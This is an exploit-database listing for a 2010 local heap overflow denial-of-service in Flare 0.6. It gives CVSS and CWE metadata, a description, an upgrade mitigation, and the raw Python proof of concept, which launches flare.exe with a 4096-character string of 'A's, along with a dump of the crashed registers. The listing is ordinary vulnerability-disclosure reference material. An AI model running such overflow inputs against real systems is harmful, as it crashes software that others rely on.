Flare - exploit.company

vendor:

Flare

by:

l3D

7,8

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: Flare

Affected Version From: 0.6

Affected Version To: 0.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7, Windows XP SP2 and some Linux distributions

2010

Flare <= 0.6 local heap overflow DoS

Flare version 0.6 is vulnerable to a local heap overflow DoS. The vulnerability is triggered when a large string of 'A's is passed as an argument to the program. This causes the program to crash due to a buffer overflow. The registers EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI, and EIP are all affected by the overflow. A python script is provided to exploit the vulnerability.

Mitigation:

Upgrade to the latest version of Flare.

Source

Exploit-DB raw data:

# Exploit Title: Flare <= 0.6 local heap overflow DoS
# Date: 3/7/2010
# Author: l3D
# Software Link: http://www.nowrap.de/download/flare06doswin.zip
# Version: 0.6
# Tested on: Windows 7, Windows XP SP2 and some linux distributions
# Code:

#!/usr/bin/env python
#IRC: irc.nix.co.il<http://irc.nix.co.il>
#Site: xraysecurity.blogspot.com<http://xraysecurity.blogspot.com> <---- Coming soon!

#Registers:
#EAX 003E0000
#ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
#EDX 41414141
#EBX 00004141
#ESP 0022FB0C
#EBP 0022FBDC
#ESI 003E1080
#EDI 41414141
#EIP 77195B44 ntdll.77195B44

import os, sys

if len(sys.argv) != 1:
    path=sys.argv[1]
else:
    path='flare.exe'

if not os.path.exists(path):
    print 'Usage: python %s [path to flare.exe]' % sys.argv[0]
    exit(-1)

os.execl(path, path, 'A'*0x1000)